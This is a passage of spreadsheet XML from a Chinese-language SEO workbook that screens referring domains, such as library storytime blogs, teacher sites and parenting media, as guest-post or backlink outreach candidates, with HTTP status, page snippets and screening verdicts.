      <x:c r="D10" s="58" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="E10" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$N$2:$N$554,"需人工核验")</x:f>
        <x:v>273</x:v>
      </x:c>
      <x:c r="G10" s="73" t="str">
        <x:v>thehomeschoolquest.com</x:v>
      </x:c>
      <x:c r="H10" s="73" t="str">
        <x:v>0/22</x:v>
      </x:c>
      <x:c r="I10" s="73" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="J10" s="73" t="str">
        <x:v>适合写家庭科学实验、单位换算教学方法等实用文章。</x:v>
      </x:c>
      <x:c r="K10" s="73" t="str">
        <x:v>https://thehomeschoolquest.com/articlesubmission</x:v>
      </x:c>
    </x:row>
    <x:row r="11">
      <x:c r="A11" s="58" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="B11" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$N$2:$N$554,A11)</x:f>
        <x:v>221</x:v>
      </x:c>
      <x:c r="D11" s="58" t="str">
        <x:v>可做候选</x:v>
      </x:c>
      <x:c r="E11" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$N$2:$N$554,"可做")</x:f>
        <x:v>4</x:v>
      </x:c>
      <x:c r="G11" s="73" t="str">
        <x:v>hessunacademy.com</x:v>
      </x:c>
      <x:c r="H11" s="73" t="str">
        <x:v>0/1</x:v>
      </x:c>
      <x:c r="I11" s="73" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="J11" s="73" t="str">
        <x:v>先发选题和大纲，不要发链接插入请求。</x:v>
      </x:c>
      <x:c r="K11" s="73" t="str">
        <x:v>https://hessunacademy.com/contact-us/</x:v>
      </x:c>
    </x:row>
    <x:row r="12">
      <x:c r="A12" s="58" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="B12" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$N$2:$N$554,A12)</x:f>
        <x:v>50</x:v>
      </x:c>
      <x:c r="D12" s="58" t="str">
        <x:v>A/B 任一 &gt; 1</x:v>
      </x:c>
      <x:c r="E12" s="58" t="n">
        <x:f>COUNTIF('逐条筛选'!$D$2:$D$554,"&gt;1")+COUNTIF('逐条筛选'!$E$2:$E$554,"&gt;1")-COUNTIFS('逐条筛选'!$D$2:$D$554,"&gt;1",'逐条筛选'!$E$2:$E$554,"&gt;1")</x:f>
        <x:v>224</x:v>
      </x:c>
      <x:c r="G12" s="73" t="str">
        <x:v>weareteachers.com</x:v>
      </x:c>
      <x:c r="H12" s="73" t="str">
        <x:v>13/0</x:v>
      </x:c>
      <x:c r="I12" s="73" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="J12" s="73" t="str">
        <x:v>优先投数学、科学或 STEAM 课堂文章。</x:v>
      </x:c>
      <x:c r="K12" s="73" t="str">
        <x:v>https://www.weareteachers.com/write-for-weareteachers/</x:v>
      </x:c>
    </x:row>
    <x:row r="13">
      <x:c r="G13" s="73" t="str">
        <x:v>glowscotland.org.uk</x:v>
      </x:c>
      <x:c r="H13" s="73" t="str">
        <x:v>13/0</x:v>
      </x:c>
      <x:c r="I13" s="73" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="J13" s="73" t="str">
        <x:v>需要准备年级、课程目标、教学用法和直接资源链接。</x:v>
      </x:c>
      <x:c r="K13" s="73" t="str">
        <x:v>https://blogs.glowscotland.org.uk/glowblogs/STEMcentralinmotion/2020/12/18/sciences-update-national-e-learning-offer/</x:v>
      </x:c>
    </x:row>
    <x:row r="14">
      <x:c r="G14" s="73" t="str">
        <x:v>tinasdynamichomeschoolplus.com</x:v>
      </x:c>
      <x:c r="H14" s="73" t="str">
        <x:v>0/11</x:v>
      </x:c>
      <x:c r="I14" s="73" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="J14" s="73" t="str">
        <x:v>产品免费是优势，但仍需先获得站长同意。</x:v>
      </x:c>
      <x:c r="K14" s="73" t="str">
        <x:v>https://tinasdynamichomeschoolplus.com/about-me/product-reviews/</x:v>
      </x:c>
    </x:row>
    <x:row r="15">
      <x:c r="G15" s="73" t="str">
        <x:v>parentmap.com</x:v>
      </x:c>
      <x:c r="H15" s="73" t="str">
        <x:v>10/0</x:v>
      </x:c>
      <x:c r="I15" s="73" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="J15" s="73" t="str">
        <x:v>更适合西雅图/家庭场景或亲子科学活动，而不是产品广告。</x:v>
      </x:c>
      <x:c r="K15" s="73" t="str">
        <x:v>https://www.parentmap.com/editorial-submissions/</x:v>
      </x:c>
    </x:row>
    <x:row r="16">
      <x:c r="G16" s="73" t="str">
        <x:v>mommypoppins.com</x:v>
      </x:c>
      <x:c r="H16" s="73" t="str">
        <x:v>4/0</x:v>
      </x:c>
      <x:c r="I16" s="73" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="J16" s="73" t="str">
        <x:v>可投‘在家做单位换算/测量的亲子科学活动’。</x:v>
      </x:c>
      <x:c r="K16" s="73" t="str">
        <x:v>https://mommypoppins.com/contributor-faq</x:v>
      </x:c>
    </x:row>
    <x:row r="17">
      <x:c r="G17" s="73" t="str">
        <x:v>loudestlibrarian.com</x:v>
      </x:c>
      <x:c r="H17" s="73" t="str">
        <x:v>30/0</x:v>
      </x:c>
      <x:c r="I17" s="73" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="J17" s="73" t="str">
        <x:v>只有能包装成儿童 STEM 活动资源时才值得联系。</x:v>
      </x:c>
      <x:c r="K17" s="73" t="str">
        <x:v>https://loudestlibrarian.com/about/</x:v>
      </x:c>
    </x:row>
    <x:row r="20" ht="32" customHeight="1">
      <x:c r="A20" s="80" t="str">
        <x:v>执行建议：先联系 educationcorner.com、thehomeschoolquest.com、hessunacademy.com；文章以课堂/家庭科学应用为主，链接放在自然的资源段或作者简介中。</x:v>
      </x:c>
      <x:c r="B20" s="80"/>
      <x:c r="C20" s="80"/>
      <x:c r="D20" s="80"/>
      <x:c r="E20" s="80"/>
      <x:c r="F20" s="80"/>
      <x:c r="G20" s="80"/>
      <x:c r="H20" s="80"/>
      <x:c r="I20" s="80"/>
      <x:c r="J20" s="80"/>
      <x:c r="K20" s="80"/>
    </x:row>
    <x:row r="22" ht="28" customHeight="1">
      <x:c r="A22" s="84" t="str">
        <x:v>原始 CSV 保留在‘原始 CSV’工作表；完整逐行记录在‘逐条筛选’工作表。所有结论均为当前核验时点判断，发布前仍需再次确认站点规则。</x:v>
      </x:c>
      <x:c r="B22" s="84"/>
      <x:c r="C22" s="84"/>
      <x:c r="D22" s="84"/>
      <x:c r="E22" s="84"/>
      <x:c r="F22" s="84"/>
      <x:c r="G22" s="84"/>
      <x:c r="H22" s="84"/>
      <x:c r="I22" s="84"/>
      <x:c r="J22" s="84"/>
      <x:c r="K22" s="84"/>
    </x:row>
  </x:sheetData>
  <x:mergeCells>
    <x:mergeCell ref="A1:H1"/>
    <x:mergeCell ref="G7:K7"/>
    <x:mergeCell ref="A20:K20"/>
    <x:mergeCell ref="A22:K22"/>
  </x:mergeCells>
  <x:conditionalFormatting sqref="I9:I17">
    <x:cfRule type="containsText" dxfId="5" priority="1" operator="containsText" text="可做"/>
    <x:cfRule type="containsText" dxfId="6" priority="2" operator="containsText" text="需人工核验"/>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28" hidden="0" customWidth="1"/>
    <x:col min="3" max="3" width="38" hidden="0" customWidth="1"/>
    <x:col min="4" max="4" width="13" hidden="0" customWidth="1"/>
    <x:col min="5" max="5" width="13" hidden="0" customWidth="1"/>
    <x:col min="6" max="6" width="10" hidden="0" customWidth="1"/>
    <x:col min="7" max="7" width="12" hidden="0" customWidth="1"/>
    <x:col min="8" max="8" width="38" hidden="0" customWidth="1"/>
    <x:col min="9" max="9" width="32" hidden="0" customWidth="1"/>
    <x:col min="10" max="10" width="22" hidden="0" customWidth="1"/>
    <x:col min="11" max="11" width="10" hidden="0" customWidth="1"/>
    <x:col min="12" max="12" width="23" hidden="0" customWidth="1"/>
    <x:col min="13" max="13" width="42" hidden="0" customWidth="1"/>
    <x:col min="14" max="14" width="14" hidden="0" customWidth="1"/>
    <x:col min="15" max="15" width="14" hidden="0" customWidth="1"/>
    <x:col min="16" max="16" width="58" hidden="0" customWidth="1"/>
    <x:col min="17" max="17" width="62" hidden="0" customWidth="1"/>
    <x:col min="18" max="18" width="23" hidden="0" customWidth="1"/>
    <x:col min="19" max="19" width="13" hidden="0" customWidth="1"/>
    <x:col min="20" max="20" width="34" hidden="0" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" ht="34" customHeight="1">
      <x:c r="A1" s="8" t="str">
        <x:v>序号</x:v>
      </x:c>
      <x:c r="B1" s="8" t="str">
        <x:v>域名</x:v>
      </x:c>
      <x:c r="C1" s="8" t="str">
        <x:v>首页 URL</x:v>
      </x:c>
      <x:c r="D1" s="8" t="str">
        <x:v>A: littlelifelonglearners</x:v>
      </x:c>
      <x:c r="E1" s="8" t="str">
        <x:v>B: natashalh</x:v>
      </x:c>
      <x:c r="F1" s="8" t="str">
        <x:v>HTTP 状态</x:v>
      </x:c>
      <x:c r="G1" s="8" t="str">
        <x:v>访问结果</x:v>
      </x:c>
      <x:c r="H1" s="8" t="str">
        <x:v>最终 URL</x:v>
      </x:c>
      <x:c r="I1" s="8" t="str">
        <x:v>页面标题</x:v>
      </x:c>
      <x:c r="J1" s="8" t="str">
        <x:v>站点主题/类型</x:v>
      </x:c>
      <x:c r="K1" s="8" t="str">
        <x:v>相关性</x:v>
      </x:c>
      <x:c r="L1" s="8" t="str">
        <x:v>投稿/资源信号</x:v>
      </x:c>
      <x:c r="M1" s="8" t="str">
        <x:v>提交入口/证据 URL</x:v>
      </x:c>
      <x:c r="N1" s="8" t="str">
        <x:v>筛选结论</x:v>
      </x:c>
      <x:c r="O1" s="8" t="str">
        <x:v>优先级</x:v>
      </x:c>
      <x:c r="P1" s="8" t="str">
        <x:v>筛选理由</x:v>
      </x:c>
      <x:c r="Q1" s="8" t="str">
        <x:v>首页摘要</x:v>
      </x:c>
      <x:c r="R1" s="8" t="str">
        <x:v>检查方式</x:v>
      </x:c>
      <x:c r="S1" s="8" t="str">
        <x:v>核验日期</x:v>
      </x:c>
      <x:c r="T1" s="8" t="str">
        <x:v>备注</x:v>
      </x:c>
    </x:row>
    <x:row r="2">
      <x:c r="A2" s="18" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="B2" s="19" t="str">
        <x:v>msemilylibrary.com</x:v>
      </x:c>
      <x:c r="C2" s="19" t="str">
        <x:v>https://msemilylibrary.com</x:v>
      </x:c>
      <x:c r="D2" s="20" t="str">
        <x:v>125</x:v>
      </x:c>
      <x:c r="E2" s="20" t="str">
        <x:v>69</x:v>
      </x:c>
      <x:c r="F2" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G2" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H2" s="19" t="str">
        <x:v>https://msemilylibrary.com/</x:v>
      </x:c>
      <x:c r="I2" s="19" t="str">
        <x:v>Storytime with Ms. Emily Library – Library storytimes, themes, ideas, and more</x:v>
      </x:c>
      <x:c r="J2" s="19" t="str">
        <x:v>儿童读写活动博客</x:v>
      </x:c>
      <x:c r="K2" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L2" s="19" t="str">
        <x:v>仅 StoryWalk 提交</x:v>
      </x:c>
      <x:c r="M2" s="19" t="str">
        <x:v>https://msemilylibrary.com/storywalk-resources/</x:v>
      </x:c>
      <x:c r="N2" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O2" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P2" s="21" t="str">
        <x:v>页面的提交机制针对 StoryWalk 提示语，不是通用教育资源或产品链接提交。</x:v>
      </x:c>
      <x:c r="Q2" s="21" t="str">
        <x:v>Library storytimes, themes, ideas, and more Storytime with Ms. Emily Library – Library storytimes, themes, ideas, and more Skip to content Menu Home Blog StoryWalk Resources Flannel Board Sets &amp; Props Ukulele Song Sheets Theme Index Repeated Songs and Rhymes About Storytime with Ms. Emily Library Library storytimes, themes, ideas, and more Toddler Storytime: Art Posted on August 28, 2026 August 25, 2026 by msemilylibrary We are back to our regular indoor storytimes for the fall season, with a few changes. I’ll spare casual readers all the details if you are only interested in the theme activities – feel free to skip the next paragraph! I am surprised that I’ve never done a general Art theme before. It’s definitely broad – art can be s</x:v>
      </x:c>
      <x:c r="R2" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S2" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T2" s="21" t="str">
        <x:v>A/B 数值很高，但属于不匹配的 referral 线索。 | 请求: https://msemilylibrary.com</x:v>
      </x:c>
    </x:row>
    <x:row r="3">
      <x:c r="A3" s="18" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="B3" s="19" t="str">
        <x:v>blogspot.com</x:v>
      </x:c>
      <x:c r="C3" s="19" t="str">
        <x:v>https://blogspot.com</x:v>
      </x:c>
      <x:c r="D3" s="20" t="str">
        <x:v>116</x:v>
      </x:c>
      <x:c r="E3" s="20" t="str">
        <x:v>4128</x:v>
      </x:c>
      <x:c r="F3" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G3" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H3" s="19" t="str">
        <x:v>https://www.blogger.com/about/?bpli=1</x:v>
      </x:c>
      <x:c r="I3" s="19" t="str">
        <x:v>Blogger.com - Create a unique and beautiful blog easily.</x:v>
      </x:c>
      <x:c r="J3" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K3" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L3" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M3" s="19" t="str">
        <x:v>https://www.blogger.com/about/?bpli=1</x:v>
      </x:c>
      <x:c r="N3" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O3" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P3" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q3" s="21" t="str">
        <x:v>Publish your passions your way. Whether you’d like to share your knowledge, experiences or the latest news, create a unique and beautiful blog. Blogger.com - Create a unique and beautiful blog easily. Skip to content Sign in Create your blog Publish your passions, your way Create a unique and beautiful blog easily. Create your blog Choose the perfect design Create a beautiful blog that fits your style. Choose from a selection of easy-to-use templates – all with flexible layouts and hundreds of background images – or design something new. Get a domain Give your blog the perfect home. Get a blogspot.com domain or buy a custom domain with just a few clicks. Earn money Get paid for your hard work. Google AdSense can automatically display relevant targeted ads on your blog so that you can earn income by posting about your passion. Know y</x:v>
      </x:c>
      <x:c r="R3" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S3" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T3" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://blogspot.com</x:v>
      </x:c>
    </x:row>
    <x:row r="4">
      <x:c r="A4" s="18" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="B4" s="19" t="str">
        <x:v>growingajeweledrose.com</x:v>
      </x:c>
      <x:c r="C4" s="19" t="str">
        <x:v>https://growingajeweledrose.com</x:v>
      </x:c>
      <x:c r="D4" s="20" t="str">
        <x:v>64</x:v>
      </x:c>
      <x:c r="E4" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F4" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G4" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H4" s="19" t="str">
        <x:v>https://www.growingajeweledrose.com/</x:v>
      </x:c>
      <x:c r="I4" s="19" t="str">
        <x:v>Growing A Jeweled Rose</x:v>
      </x:c>
      <x:c r="J4" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K4" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L4" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M4" s="19" t="str">
        <x:v>https://www.growingajeweledrose.com/</x:v>
      </x:c>
      <x:c r="N4" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O4" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P4" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q4" s="21" t="str">
        <x:v>Fun and educational kids activities - slime, glow in the dark, play dough, science experiments, kids crafts, fun recipes, and more! Growing A Jeweled Rose Growing A Jeweled Rose Growing a Jeweled Rose - Kids Activities, Craft Recipes Powered by Blogger Archive August 2026 49 July 2026 13 June 2026 10 May 2026 17 April 2026 32 March 2021 2 February 2021 13 January 2021 11 October 2020 17 September 2020 8 August 2020 4 July 2020 18 March 2020 4 February 2020 11 December 2019 13 November 2019 20 October 2019 9 August 2019 9 July 2019 4 June 2019 9 May 2019 1 April 2019 6 March 2019 13 February 2019 13 January 2019 7 December 2018 11 November 2018 4 August 2018 2 July 2018 8 April 2018 10 March 2018 14 February 2018 1 January 2018 3 December 2017 7 November 2017 2 August 2017 2 July 2017 2 May 2017 1 April 2017 1 February 20</x:v>
      </x:c>
      <x:c r="R4" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S4" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T4" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://growingajeweledrose.com</x:v>
      </x:c>
    </x:row>
    <x:row r="5">
      <x:c r="A5" s="18" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="B5" s="19" t="str">
        <x:v>helpscoutdocs.com</x:v>
      </x:c>
      <x:c r="C5" s="19" t="str">
        <x:v>https://helpscoutdocs.com</x:v>
      </x:c>
      <x:c r="D5" s="20" t="str">
        <x:v>57</x:v>
      </x:c>
      <x:c r="E5" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F5" s="20" t="str">
        <x:v>404</x:v>
      </x:c>
      <x:c r="G5" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H5" s="19" t="str">
        <x:v>https://helpscoutdocs.com/</x:v>
      </x:c>
      <x:c r="I5" s="19" t="str">
        <x:v>Not Found</x:v>
      </x:c>
      <x:c r="J5" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K5" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L5" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M5" s="19" t="str">
        <x:v>https://helpscoutdocs.com/</x:v>
      </x:c>
      <x:c r="N5" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O5" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P5" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q5" s="21" t="str">
        <x:v>Not Found Page Not Found No settings were found for this company: {0}</x:v>
      </x:c>
      <x:c r="R5" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S5" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T5" s="21" t="str">
        <x:v>请求: https://helpscoutdocs.com</x:v>
      </x:c>
    </x:row>
    <x:row r="6">
      <x:c r="A6" s="18" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="B6" s="19" t="str">
        <x:v>bing.com</x:v>
      </x:c>
      <x:c r="C6" s="19" t="str">
        <x:v>https://bing.com</x:v>
      </x:c>
      <x:c r="D6" s="20" t="str">
        <x:v>49</x:v>
      </x:c>
      <x:c r="E6" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F6" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G6" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H6" s="19" t="str">
        <x:v>https://www.bing.com/?toWww=1&amp;redig=E28837FE79CB4ED2A128D2F3B20AD036</x:v>
      </x:c>
      <x:c r="I6" s="19" t="str">
        <x:v>検索 - Microsoft Bing</x:v>
      </x:c>
      <x:c r="J6" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K6" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L6" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M6" s="19" t="str">
        <x:v>https://www.bing.com/?toWww=1&amp;redig=E28837FE79CB4ED2A128D2F3B20AD036</x:v>
      </x:c>
      <x:c r="N6" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O6" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P6" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q6"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Copilot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6" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S6" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T6" s="21" t="str">
        <x:v>请求: https://bing.com</x:v>
      </x:c>
    </x:row>
    <x:row r="7">
      <x:c r="A7" s="18" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="B7" s="19" t="str">
        <x:v>kidsactivitiesblog.com</x:v>
      </x:c>
      <x:c r="C7" s="19" t="str">
        <x:v>https://kidsactivitiesblog.com</x:v>
      </x:c>
      <x:c r="D7" s="20" t="str">
        <x:v>32</x:v>
      </x:c>
      <x:c r="E7" s="20" t="str">
        <x:v>8</x:v>
      </x:c>
      <x:c r="F7" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G7" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H7" s="19" t="str">
        <x:v>https://kidsactivitiesblog.com/</x:v>
      </x:c>
      <x:c r="I7" s="19" t="str">
        <x:v>Security Verification</x:v>
      </x:c>
      <x:c r="J7" s="19" t="str">
        <x:v>亲子活动媒体</x:v>
      </x:c>
      <x:c r="K7" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L7" s="19" t="str">
        <x:v>仅付费合作</x:v>
      </x:c>
      <x:c r="M7" s="19" t="str">
        <x:v>https://kidsactivitiesblog.com/about/kids-activities-bloggers/work-with-holly-homer/</x:v>
      </x:c>
      <x:c r="N7" s="19" t="str">
        <x:v>付费/不优先</x:v>
      </x:c>
      <x:c r="O7" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P7" s="21" t="str">
        <x:v>当前合作页明确不接受 guest posts，主要是 sponsored posts、giveaways 等付费合作。</x:v>
      </x:c>
      <x:c r="Q7"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a349b8e1e98949a8-NRT Client IP: 61.211.1.60 Open Support Ticket Please include these details when opening a support ticket so we can quickly locate the challenged request.</x:v>
      </x:c>
      <x:c r="R7" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S7" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T7" s="21" t="str">
        <x:v>不列入免费外链批次。 | 请求: https://kidsactivitiesblog.com</x:v>
      </x:c>
    </x:row>
    <x:row r="8">
      <x:c r="A8" s="18" t="str">
        <x:v>7</x:v>
      </x:c>
      <x:c r="B8" s="19" t="str">
        <x:v>loudestlibrarian.com</x:v>
      </x:c>
      <x:c r="C8" s="19" t="str">
        <x:v>https://loudestlibrarian.com</x:v>
      </x:c>
      <x:c r="D8" s="20" t="str">
        <x:v>30</x:v>
      </x:c>
      <x:c r="E8" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F8" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G8" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H8" s="19" t="str">
        <x:v>https://loudestlibrarian.com/</x:v>
      </x:c>
      <x:c r="I8" s="19" t="str">
        <x:v>The Loudest Librarian! | Weekly library storytime themes, book recommendations, songs, crafts, and other library programming ideas</x:v>
      </x:c>
      <x:c r="J8" s="19" t="str">
        <x:v>儿童图书馆资源博客</x:v>
      </x:c>
      <x:c r="K8" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L8" s="19" t="str">
        <x:v>资源推荐/联系</x:v>
      </x:c>
      <x:c r="M8" s="19" t="str">
        <x:v>https://loudestlibrarian.com/about/</x:v>
      </x:c>
      <x:c r="N8" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O8" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P8" s="21" t="str">
        <x:v>站点表示欢迎分享书籍和活动推荐并会为来源提供 credit，但没有标准外链提交表单。</x:v>
      </x:c>
      <x:c r="Q8" s="21" t="str">
        <x:v>Weekly library storytime themes, book recommendations, songs, crafts, and other library programming ideas The Loudest Librarian! | Weekly library storytime themes, book recommendations, songs, crafts, and other library programming ideas The Loudest Librarian! Weekly library storytime themes, book recommendations, songs, crafts, and other library programming ideas Menu Skip to content Search for: Search Button Home About the Loudest Librarian Library Program Ideas Original Songs Storytime Themes 27 Aug 2026 T-riffic Reads: A Storytime About the Letter T Posted in Storytime themes by worldsloudestlibrarian Early Literacy Tip: Point out that letters can make different sounds when combined with other letters (for example, Tr ), and can change one word into another. For example: tee becomes tree, tai</x:v>
      </x:c>
      <x:c r="R8" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S8" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T8" s="21" t="str">
        <x:v>只有能包装成儿童 STEM 活动资源时才值得联系。 | 请求: https://loudestlibrarian.com</x:v>
      </x:c>
    </x:row>
    <x:row r="9">
      <x:c r="A9" s="18" t="str">
        <x:v>8</x:v>
      </x:c>
      <x:c r="B9" s="19" t="str">
        <x:v>teacherspayteachers.com</x:v>
      </x:c>
      <x:c r="C9" s="19" t="str">
        <x:v>https://teacherspayteachers.com</x:v>
      </x:c>
      <x:c r="D9" s="20" t="str">
        <x:v>28</x:v>
      </x:c>
      <x:c r="E9" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F9" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G9" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H9" s="19" t="str">
        <x:v>https://www.teacherspayteachers.com/</x:v>
      </x:c>
      <x:c r="I9" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J9" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K9" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L9" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M9" s="19" t="str">
        <x:v>https://www.teacherspayteachers.com/</x:v>
      </x:c>
      <x:c r="N9" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O9" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P9" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q9" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R9" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S9" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T9" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://teacherspayteachers.com</x:v>
      </x:c>
    </x:row>
    <x:row r="10">
      <x:c r="A10" s="18" t="str">
        <x:v>9</x:v>
      </x:c>
      <x:c r="B10" s="19" t="str">
        <x:v>tinybeans.com</x:v>
      </x:c>
      <x:c r="C10" s="19" t="str">
        <x:v>https://tinybeans.com</x:v>
      </x:c>
      <x:c r="D10" s="20" t="str">
        <x:v>16</x:v>
      </x:c>
      <x:c r="E10" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F10" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G10" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H10" s="19" t="str">
        <x:v>https://tinybeans.com/</x:v>
      </x:c>
      <x:c r="I10" s="19" t="str">
        <x:v>Tinybeans&amp;mdash;The Photo-Sharing App That Families Love</x:v>
      </x:c>
      <x:c r="J10" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K10" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L10" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M10" s="19" t="str">
        <x:v>https://tinybeans.com/</x:v>
      </x:c>
      <x:c r="N10" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O10" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P10" s="21" t="str">
